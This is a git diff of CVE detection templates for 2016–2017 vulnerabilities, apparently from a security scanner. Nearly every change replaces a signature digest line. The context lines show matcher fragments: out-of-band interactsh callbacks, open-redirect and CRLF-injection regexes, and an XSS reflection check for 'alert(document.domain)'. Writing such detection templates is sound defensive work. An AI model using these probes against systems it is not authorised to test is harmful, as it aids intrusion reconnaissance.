b/http/cves/2016/CVE-2016-1000153.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220627b58f530bbb0115c85739599c4cece9a4df5eb5b81f216bf26be814dc6808b022021cc883c5a23161c59c11624f5261181500af0ae67b6674a238217f42a3b481e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210089c5edc2eb87f5da1064a159cf7f32662a5ff10adb1a88e266a3be9e8c44414e02203d2fafc9a136489d3381e3239f9b4b0e8eb2b6de6068a13af24f3d30ff6e595d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index c6a55c3968..cbf452b3a5 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e01456d24c3d1c7dbdd0de4f994cdae1da5de3630852be279bb699588ac4d2f9022047f04eea04353e710328dc784c5df48778f2a3169a7a4b84a3182656d1c80ecc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100aeb122d4a242eb76ecf3384c657b25e86d5853f9f981d8b0b5e93011f15c50be02206748cf7695e6777872df24baaaf360f8ba1be607f3f7fc7ea830672d400c8b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 986f4c0319..6e3c3ff43b 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100871602e9aebed55be6370094082217d72c95a37b44766b236b9d7343401cf1fc022016e89445a9a7ed4fef502da3f38d4da76b3925af5673f877a1b883cd2d2c0a3d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207a9ce6ca68359b02ab5d56211b8643f249c72e1b501987be88b3eeb1f8ed30c2022100cb064048e3d8bde91eb0ce27ad8765ddb8ce7ebe332a0140b40ca1ece73922ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 2f39ff888b..321ec32323 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -63,5 +63,4 @@ http: - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>' internal: true part: body - -# digest: 490a0046304402200823b36ed8c384107dd66bdaef45646741be6d5603e07f0899cb696d0f2dee480220441f8ece5c1a5af625091ed6e0d488a2456c25e0bd24ad93a7a51a9baa23cac9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210080bd22de58c874352b78ef78e9714dc623c3ce4caaea496fd9ed1409f274d3fb0221008d3a38dc657c31850ed4d7efc83ce046eb42b460938733ba7ef4d843d70dc86c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index 8180492e84..603f2a2d67 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -42,5 +42,4 @@ http: - contains(interactsh_protocol, "dns") - status_code == 200 condition: and - -# digest: 4b0a00483046022100dcea79d06865f3be0037a4e0698dd8ed3bf17276573c6e3ffc1e8df12c6d7c79022100b8352de75c24b1cbc3cc28c19b6d3f07a3a366a103d358cf03003b111c41407b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009a12b40c819d35318d262c6db3990a6ad34a9c7ec283a59b47b62c0d883d188e022012a20a546109705cd04eca137ec645ade8f6eb1574857f8e2bff4aca640d7e43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index 7dbf9d4f44..f2ad434164 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202abd8a25530a6f41f77beb5fbcbc797b6216745324f190a194caab8e3e342c1f02204c5018f2b3bb326b0476a58ca8cc653ab8d7fa406609553ca80195750446a124:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b6e196b2e9c3d990bae609c91b3a9357ac6346db2d1dc64aac6fe947cbf341840220629b81064100eb66094e5baff1c8df2154289e34a5edb183a660853b116a11c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index 6ec11709cb..ca3bab297b 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 404 - -# digest: 4a0a00473045022100ed238176eab5f73bee51a98663a0fa12d4cbaf6f45a7c449255dcdb6a0d0eaad0220712996276d9446ef98bb224bbdc59534e49eb9c0711c393c809cdecb3b446292:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e9539f1e5fcbd965c989f24cc3c00c7670114e6733c8992335136249d05319cf02206be55e59631875ee8969ac16f8c08995ab83c976dabab4e19e0833f03d8084c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index f4fcc23584..14b0c0ab29 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 302 - -# digest: 4a0a00473045022100ffd287f7f00bd34f6e17177e53cdcf9a2947ef811b10a6ee04fdefabb741eead02202f9b7534e38c4df256c9580fb688e1436ad41130c47d58194f41db187d9f30b3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c57dd277258008be308fbd88faea3a7f6cbaac9fd6a54215ccc5a3cad396961602204420410f12d24a00eff47d40ebc0d3e8bd10cae1f0b3c94badc92cf13cc30b29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 4227416323..c92be305e1 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e962baf6324984d21ad329c32685c3606c4d7c799233ac229fb4d1f1889d7949022100afb07fb17af767c72c84c918e2d10f3b9a31c5d0f856b30c9664ad40a3b3b653:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022031b534cd1736e1afe417fe966f5e54bba813e8b30771896db06bda88ca9995d7022049e8edcbb2b131fac234a320fcf47ca9478e2afe8ffcb6943432f550f36e1660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index f72b5384ac..443abecba8 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -55,5 +55,4 @@ http: - 'contains(body_2, "<th scope=\"row\" class=\"check-column\">")' - '!contains(body_3, "<th scope=\"row\" class=\"check-column\">")' condition: and - -# digest: 4b0a00483046022100f7e94c5712ca2569bbfb9ef2147026d877a90e2e3e6435e7bf45e066b047b3be022100ee5e51486cc8d2acf9b64d5c49485aa1d884224b3088665d8550cfb020eaef28:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022044d6b5b5a29a301a15487ce0912b497d9c0ee822ba73ecde3bbe4e2cfb4e9c78022100e4cf4d42079d373261d37f5e4df5429c38dc88685120e993af8f85c7276cc388:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index ffebba7926..8c30ea4fd0 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -45,5 +45,4 @@ http: status: - 200 - 500 - -# digest: 4a0a004730450221008114a7c963c88b1bb21ad429a894b04a6b1c213da6969ecb5ec391d43f2c0e4a02205dabef6e5a73bbf8142c5711b2ef6741cb902a082b72fe8c2d214f4298fac12d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b410d7d1262e374654ca6a24a6b5938fedd537ec7539cc3fb7a72d78afe467b2022100ad2e8828a363840a54a369f61172118ae1c8496e31e02e254ba9c0f6a81aec11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index 272724c215..b5ce128dc8 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201fe36d5dd079f96b7465ef5a1f9fcf2a3b3e432eabb92e5a1ebc0a550530532f02201600974c47ac86da2024baa19a1a96d3377d7c4af8d78c035cdf85be63cf976c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cb55961b104ae6c6e28d72d8246bcf4c06bb6f2199efb06ea4630a8be470f64b022100d92e9e47eb03f4a213ce67c8931fb929ab17ef5a28f0f3d28aa5e27afad58e45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index 694c0528eb..3df787cd8d 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "tab = alert(document.domain);")' - 'contains(body_2, "Brafton Article Loader")' condition: and - -# digest: 4a0a004730450220679f94270a481d4b815a649c00ae980a4cdde80bc7c5cc6504852910eed7ce47022100d3854e01c11adb14a34ca2ea0e41b263d68d8954ec633096e4b0c80249c6419a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206754dc149d991daafbd6cccf8dbac9062dd4f1004c081c61f16a51fdaa15d994022100b3862895d64565ad56e3a37468b1ebd833571f02042f3167493417a512fa11c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 78ef2a5c28..068ced3dc0 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b8f1ea173c4f4cb6b82bcd63bdf05c43deb08041c39484b1003a23dbbe6a5c0002200b0f58457481d3560a0ed9fee3accfb0016df0e4739db0815a7f5c9b6114cacf:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d15aa598128c2b47e140958f6eb068d11a1f5613e430148a809950860341f84a022100b5b7ff5b3b6897397a85f5ba5297cb846c279a1946cfc6e65cf75c8244f3db91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index c1f24a333f..2491f798bb 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -42,5 +42,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4b0a00483046022100b4c589de60d3dfefd0d3ffc19812d2fcc77387c26e06d93c7750be2e9db7d302022100f3058fc59a2aa33227499ea390ac1e0c171bed400f47cfbc7c145bf43ea83329:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b589a2b32ba19d7f506b7ed6af5fe7e4a3169bd8fbbe9edb1059206d4051fd1c02206f742060f0bf741b31a1e015de9ccd8189f893afa8bcc7289d93a530a910aa96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index e463a30755..7890708476 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205b71100f4096922abfe50ad140e81b278cf140ea26484c67823ada3364b4698302205398be9c23ebe977165ab09ee313e4cb5c684c35bf389c55bf0cbd0d70503a3b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d7e6cd49940e23aed2a09da70781cb4182aa4920e55778731707731d40b7b549022100d2a953ac07d4013368175b2f2679cac0185270749849805dfd05afda499a54e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 7116cabc58..ae8f99c072 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -48,5 +48,4 @@ http: - "status_code_2==200" - "contains((body_2), '{{rand1}}')" condition: and - -# digest: 490a004630440220045e6dba4025fa6f4ff85ca8a58a479ecbe101c4bffbfd2a8b7cd28dfff811ab022072092eaa6eda114fb3aaed43175db99f082b02e5fdc92dd2a0dd309ac9504188:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220603cf3b86cb23238a73ea463a9765aa883396dccda40b8a5ce72d8dee5b48b39022047b0f89cda1af558de1c8dbf5a777e15e7e7080828cb9b5c2609c3ddae5f7c2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 846d0a893d..9d7f2ee7df 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -36,5 +36,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a00483046022100821fdc715aa91505e651ea079876287eb51c993c5fbb5dd25177643c5c1f18510221009f9bceea48570bf97154629270b89e566781a1b6b6636477294203e17e7c643f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c94bb68f2c3238c7c56ab598671ad5abd276fd8f73bda0388e3ea68e88abc83e022100f32bf2d87fe9bc6450adfe960cca7496b1a23eb470c25e8609704c742485d250:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index 1831fb648d..83194db8f1 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -41,5 +41,4 @@ http: part: interactsh_protocol words: - dns - -# digest: 490a00463044022050331d9c4524ce6efab826e18a7bd1adf137d31fb3d1599465f98a8c29f5c49302207f67d01a910b9a70b0c77abfdf49941812ffbe7b3af07160113de70cdb4b38a2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100987c28b3eeeeefe697342bb6f6823d6c722cee9a8c9ac6fc4e5b61b64c64ad1002205647ed631c9ed87cedc4fafee8edd61281ffcf50226428eea24086b7e972ca22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 53f9f26d69..3a5ced770b 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -36,5 +36,4 @@ http: part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' - -# digest: 4a0a00473045022100baaf9a8154cdf9ee40a65d4c94690ad0b216196d125280ccd32ceada67cee9830220095b479d4d69981a9e261ca716c766eb3943cb8dbc0ba04d05a3d722e6087e16:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022008b2d047984c4c9cc384341b556e146a8925e84daab2b334553f77eacca815ac0221008c699b18ad67ded63d6c83bd36bcaf2c807591d5b0b51f9d0f0b7d03f5f22158:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index 03c076baf5..903491b1c0 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 400 - -# digest: 4b0a0048304602210092dd9c2a5acb90ffb04438026913fe7800a9900b58dcbba76f851d977092d3fa022100a472a55f0ac715ca533163137b53575f36facf9469249d5d1aa958e1da7590a2:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022003b1239ee648ddd6d4912a213e3ad358839304a83b6a46d0ebc6bff13690432a02207b48c42cdbf58318ee885b8a111e824483d0b2dad2b0cd930918a1996d90a91b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index a2b8fdeeaa..81153ac607 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -50,5 +50,4 @@ http: regex: - '<b>Success "([a-z]+)"' part: body - -# digest: 4a0a00473045022100980f57c30aa860f1f780de4791c3ec448535e2cbe69b715ea45e05d40c3f85f402202dfe49ab619552bf8bd16d0420bf5f255ec3aba97bdbb2d2f77400ac90fd50b3:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220066fd906716254d5917cc93fcc386887717e79cdd7ae9200ce88e3a643ffdf7b022065830420cc80458c5cbcd7f270a98d083095f713b7d15bc91b88d3a5028a1245:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 46116594b9..2064c0f703 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -54,5 +54,4 @@ http: - 200 - 503 condition: or - -# digest: 4a0a0047304502206efffeaec7e9088e075946e1ccfa8bb1e1f50a4ff60b4a4ee752ddfccda517c402210091b57d554fa3ac82148dcd0bb04e4894539d9a772c82a2c4cb24bd9097250823:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220148de5e061a5fe3c6251106bab498d7528013e666aa29dec23d9e56137ecc6e3022100bff36120bf8be39928532a80d88f9b499c3209b24b6514ec62efea47503690e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index c795e3500e..b14ba0f27e 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e5c8d892e43e5c2786f9725a151cc9c0754155ba518a0b412f02d1826b65ea5c022031ee661c2e59f3c45d8d0d0bd9897d8ccd21e3faddc773d113e7892df46f3e96:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206775efc5bf9eda40a73a53b5169085f2193d8b9f5f421ca398c1b084c14ec3ff022100f1431c2fb7e0c6738c1a50f0ccfc815f7da5811487d5cdae95c1724e397afbb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 63d2947ce7..bcf5c859bb 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 204 - -# digest: 4a0a00473045022100f4a7e8b5e80ccc6b064d724856fe104427dbf6b838e73fb039ebfeb8c38d6dfa0220012f90486a8b4b23b1330191fa1991a61bded2227ec3a5d21670aa2b68116d9c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202f7bc52036f233ade130676b1a542d6672a856b8e2cdf935002e9574522633af022100ebded8eb1eeb3064f789355e6da69d70754e8df600ac7867bbab33b786c837ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 0e51380b32..425ba5b395 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100904657dc4f79c9ac34921ae3543b9ed0c0ab5e77cf2274508c2e9233384fc80102204d54dd14690a070d19691ef8120b49cfc19b5f37787255612227376076e0cd6e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e8576c03b674ff569e35c617d3979a70cde9a211857142af09419eb6c2535644022100ef720c72ad1d65302c5fa04b53b637365fb2fbba25edab3eefa5e78b5048665a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 95996cfd01..f2229cb47a 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100929a4c3eac42b3c2940fbfb661b2b2b7b8645060faef28fe9666109d4aeee63102210095995eed73b8eb83c1e8ca1983f1f621b74b89516ac0fd823eddb42e5c48633d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022067afba97a3c1f9d4883ae2a131a673ebce25c652be1bb2bd534db42d34652860022100a30be300f2ef829bc281d125ffc08253c388e160c808ba21f47548b7db45caf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index 03639fd49d..d7f2903f4f 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 500 - -# digest: 4a0a004730450221008ac0ca124cf0f0f9eddd29f373266ff2c1c7e8b1fc05c64bc8d7e9892aa78a4302203b7a90d7f82d44d2b73ff15e64b8da98a2341677c31d65c9f741036cde999d72:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008a0ffe3bf6999a6ab86201614673d3aca46be290b8c77008f649504256f7a6a502201f0eb82ecb1070609be7ddbb458fefc12c609ee2be6c18f7c9b90b3afaa1b13a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index d6b3462048..5c10d66115 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220086dfd815f9a6b08b655b1bd1e6e63201ced6b661e40e4440a4768c6e2db5176022100d07e638bede3040f874985ad9491ac96049bbe0453c640a3045fcf7bc04967e0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a18dc7393df9179d18c3db3b4e4539eb0eaa9c5b650d3803b29274dc14b1427102204517d81ec64845e9081f0febad2be6fae680c24299c3a0ddad350456435708cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 106a93e8b3..364a2ec492 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - -# digest: 490a004630440220376fdc6239fa776f508f632c09cb9fd83b055f02013d8e9b11a29603f91d8b4702201df506f06dfeb4316c9a7a07e5d1456742a1b64a97492d85133eb892d87d923a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206f4828415f2bb1b65f98cfd38f1149d459b634627d0640a05052604c631c0ebf022100f663e48eca9619f74e0275c99d70bcf2e3c655ede185e3085928570c420f3ede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 7873579259..e4898281a6 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100dcb556f279ffeefe4e8a8e6dfa26deee8976b8f34af4231526f8ac9f4920576c022100b371e8a69194b2a355c643a46fba023fd0a3e4339fd0f8d7544560bc2778c330:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022016116d772705a276c34480c0f9627376e52e7eda6bb5995cfb901c2efd1841d2022100d68242df604b1cb72ff4f31bcf3995befc0f90226bd7a36dc890282eb3fc3364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index df41811845..e1da7dff86 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -43,5 +43,4 @@ http: part: header words: - 'Mogwailabs: CHECKCHECK' - -# digest: 490a0046304402207a9a0d453f87998700509b4812b697c4704365a02a4f74fb67ef4b676f47a58602201a825c0eb5d4bdb8ee97ba38c434d50d49061112bebf1eea7fa27c70a7e691a2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009751eeea38d45a9d90ecd16eb749a67cf3b7a988e8f6ae1b5a314b3facb6699d02205f18bd8a9d0fea8b08944d7f5df18afaa65925804041f988b6d2c6df15d27ab6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index 3c89ef2921..c16b436945 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210086c95c3150a48f3f6df2a0449bc86dcdfbfaa236a901bea6efcab47df6359de2022100da295fa61d4d38df5d5565c8878bef59513e1e1279e95771ad210d4f47223635:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200094c53c9a11b9878cbbbe6f57f0afdce6bdbfee18700b93e314ebd737d817be0221009b381aae59dfef2fe5b1aa0452c59222be6a52bec0976f0ad8839ddfd9227d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index 6ea3324b7a..4e41f564af 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203697e91db9424e1ef79b62122a72744581da4b2a6b0a5890be4e7737d8a690cb0220040d1923c5c5c554193c647bcf308065a5405f398c2bb1030a1572442c968937:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f0ee16bfd334202d34e82770eefdde767c08a4a012e6d89aa68a09001f56ba4802206bad82fe19a84739fa0bc6c97f5cf233c4d3cb583393472ad20a3ddba34daa6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index f8323cf758..61697de704 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204250f154c209acf6ccdbdf9b917446692d181050f812974e7bd9bea3f2f36b1502210082f329673b7b640dc69e7685e1d2fbb81d66fe199173f65c4ff4c77163df3214:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100da68591ff898e55aeaa90134b84db80d0455137f677660cbd23b3af8b598e3bb0221008ecee9ce21ebba194e5a217ea052cf06f46749ddee3437462c610c4f8a0984d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 88b254d189..276a8a85e0 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200c38361ffe3d8057c9c19f626bb355cb0b5f864fdc2a47bbb127510294829738022100d8d617be7cf4064c95ff15a65a9bdc7f6cac0089beec195101ce5439ddbe2707:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202d82ea1ffa946dcf776ec5c2d69adc0af06854bcf30f56d8ca2d16109225397b022100858e832d405ce9e48e140e1799bb3df9a93f314dbcfa0846fe5c6357c37f8555:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index 0bda8d2dd0..e9326027ff 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -43,5 +43,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 